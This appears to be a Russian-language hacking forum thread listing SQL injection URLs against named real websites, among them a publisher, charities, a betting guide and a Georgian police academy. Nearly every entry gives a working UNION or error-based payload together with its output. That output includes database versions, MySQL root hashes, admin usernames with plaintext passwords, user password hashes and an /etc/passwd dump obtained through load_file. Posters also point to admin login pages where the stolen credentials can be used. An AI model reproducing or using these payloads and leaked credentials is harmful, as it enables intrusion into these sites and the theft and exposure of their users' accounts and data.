http://koleso.topof.ru/ HTML: http://koleso.topof.ru/product_info.php?pID=1223+UNION+SELECT+1,concat(version(),0x3a,database(),0x3a,user())/* 5.0.22:koleso_ktopof:koleso_ktopof@localhost HTML: http://koleso.topof.ru/product_info.php?pID=1223+UNION+SELECT+1,table_name+FROM+information_schema.tables/* HTML: http://koleso.topof.ru/product_info.php?pID=1223+UNION+SELECT+1,concat(admin_id,0x3a,admin_name,0x3a,admin_password)+FROM+admins/* HTML: http://koleso.topof.ru/product_info.php?pID=1223+UNION+SELECT+1,concat(user_id,0x3a,username,0x3a,user_password,0x3a,user_email,0x3a,user_icq)+FROM+lotus_users/* P.S. Лимит не нужен =)
Издательство Дрофа! HTML: http://www.drofa.ru/index_i.html?id_page=-1+union+select+1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12/* h_drofa_ru@localhost:4.1.22-log:drofa_ru
http://www.aiim.org/ HTML: http://www.aiim.org/standards.asp?id=1+or+1=(SELECT+TOP+1+cast(Email+as+nvarchar)%2B%27%3A%27%2Bcast(PWD+as+nvarchar)+FROM+vwWebUsers+WHERE+ID=10)-- [email protected]:6520 С полученным добром заходим на: http://www.aiim.org/login.asp P.S. Прокручивайте ID =))
http://www.segfl.org.uk/ Code: http://www.segfl.org.uk/news/view.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+mysql.user/*
Английская букмекерская контора www.online-betting-guide.co.uk Code: http://www.online-betting-guide.co.uk/tips/tipster.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70+from+mysql.user+limit+5,1+--+ root:2bc39bf13f7a9949 Code: http://www.online-betting-guide.co.uk/tips/tipster.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,uname,password,balance,email),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70+from+betting.ad_advertisers+limit+0,1+--+ разрешено чтение файлов Code: http://www.online-betting-guide.co.uk/tips/tipster.php?id=-1+union+select+1,2,3,4,5,6,7,8,load_file(0x2F6574632F706173737764),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70+--+ Code: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin proftpd:x:1002:103::/home:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash invendium:x:1003:1003::/home/backup:/bin/bash www.tv-history.tv Code: http://www.tv-history.tv/preview.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+--+ 4.1.15-Debian_1ubuntu5:sqlsixnet@localhost:tv-history Есть табличка admin
renegadecommentaries.co.uk HTML: http://www.renegadecommentaries.co.uk/commentary.php?movie=1+union+select+0,VERSION(),DATABASE(),USER(),4,5/* USER:renegade_khayman@localhost VERSION:4.1.22-standard-log DATABASE:renegade_maintest Есть таблица users, поля id и password. HTML: http://www.renegadecommentaries.co.uk/commentary.php?movie=1+union+select+0,1,2,concat(id,0x3a,password),4,5+from+users/*
http://www.akulovagora.ru/ HTML: http://www.akulovagora.ru/page.php?pid=12'+and(1=2)+UNION+SELECT+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6/* 4.1.21-log:[email protected]:alukova
http://moscowtoday.info/ Code: http://moscowtoday.info/news.php?ID=-1'+union+select+concat_ws(0x3a,user(),database(),version())/* вывод данных в тайтле...
Code: http://www.myvideo.ge/cams/goLive.php?act=View&st_u_id=-24969+union+select+1,2,3,concat_ws(0x2F,user_id,user_name,user_password),version(),6,7,8+from+video_users/* Version 5.0.22-log user_name Password Guro f5d1278e8109edd94e1e4197e04873b9 achiko 202cb962ac59075b964b07152d234b70
Год моей регистрации! hcch.net Code: http://www.hcch.net/index_en.php?act=conventions.text&cid=-1+union+select+aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),2,3,4/* 4.1.11-Debian_4sarge7-log:hcch:hcch@localhost [ Логин : MySQL(pass) ] : Code: root : 066bc62049564980 group.ge Code: http://www.group.ge/series.php?id_pro=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13/* 5.0.22:grp:grp@localhost PoliceAcademy.ge - Академия МВД Грузии Code: http://www.policeacademy.ge/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16/* 5.0.22:academy:cube@localhost Таблица authentification: Code: id,username,password,survey_user,survey_pass,live_user,live_pass,level admin:studio0386 Таблица _forum_members : Code: id,name,mgroup,legacy_password,email,joined,ip_address,posts,title,allow_admin_mails, time_offset,hide_email,email_pm,email_full,skin,warn_level,warn_lastwarn,language, last_post,restrict_post,view_sigs,view_img,view_avs,view_pop,bday_day,bday_month, bday_year,new_msg,msg_total,show_popup,misc,last_visit,last_activity,dst_in_use, view_prefs,coppa_user,mod_posts,auto_track,temp_ban,sub_end,login_anonymous, ignored_users,mgroup_others,org_perm_id,member_login_key,subs_pkg_chosen,has_blog, members_markers,members_editor_choice,members_auto_dst,members_display_name, members_created_remote,members_cache,members_disable_pm Есть таблица _forum_moderators
http://www.blagotvori.com Code: http://www.blagotvori.com/programs.php?pid=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,passwd),8,9,10,11,12+from+admin/* Админка: http://www.blagotvori.com/admin/ login: nat_nadegdina pass: nAtt756V12r
www.uprava.org - Сайт журнала посвященного вопросам местного самоуправления в России. Code: http://www.uprava.org/section.php?id=34+union+select+0,1,2,3,4,5,concat_ws(0x2F,user())-- www.gaycentral.ru - Сайт Гей-Клуба "Три Обезьяны" Code: http://www.gaycentral.ru/news/?id=99999999+union+select+0,null,concat_ws(0x2F,user(),version()),2,3,null,null,null,4,null,5--
Первый эду который гугл выдает на "You have an error in your SQL syntax"(вывод в титле): http://ipr1.hsc.usc.edu/php/wwwthreads5.4/showflat.php?Cat=-1'%20union%20select%20+concat(U_Name,char(59),U_Password)+FROM+w3t_Users+LIMIT%202,1/*
kinopano.ru HTML: http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,4,5,6,7,8,9,10/* HTML: http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),5,6,7,8,9,10/* USER:[email protected] VERSION:5.0.45-log DATABASE:u24822 Вывод названий всех таблиц - HTML: http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,table_name,5,6,7,8,9,10+from+information_schema.tables/* Вывод названий всех колонн - HTML: http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,column_name,5,6,7,8,9,10+from+information_schema.columns/* Вывод id,name,passwd из таблици kino_users - HTML: http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,concat(id,0x3a,name,0x3a,passwd),5,6,7,8,9,10+from+kino_users/* Админка - HTML: http://www.kinopano.ru/admin/
Code: http://www.green-bay.tv/e_commitem.php?id=-31+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13+from+users/* gbadmin:Rhondda
http://www.awdf.org/ Code: http://www.awdf.org/pages/?pid=2&sid=-1+union+select+concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user/* root:59b5b2b07b506bfa Версия мускула пятая, так что можно перебирать все таблицы, у меня почему-то сайт начинает глючить при переборе.... Code: http://www.awdf.org/pages/?pid=2&sid=-1+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables+limit+0,1/* http://www.akulovagora.ru/ Code: http://www.akulovagora.ru/page.php?pid=-1'+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6/*
Фото студия)) http://www.2dstudio.ru/photo.php?id=-850+union+select+1,2,Version(),4/* А вот еще их админка http://www.2dstudio.ru/admin/
http://www.scripofilia.it/ Code: http://www.scripofilia.it/product.asp?pid=1+or+1=(SELECT+TOP+1+cast(user_username+as+nva rchar)%2B%27%3A%27%2Bcast(user_PASSWORD+as+nvarchar)+from+userS)-- http://www.dataplace.to/ Code: http://www.dataplace.to/newhotel.asp?id=1+or+1=(SELECT+TOP+1+cast(logon_name+as+nvarch ar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+administrator+where+administrator_id=1)--
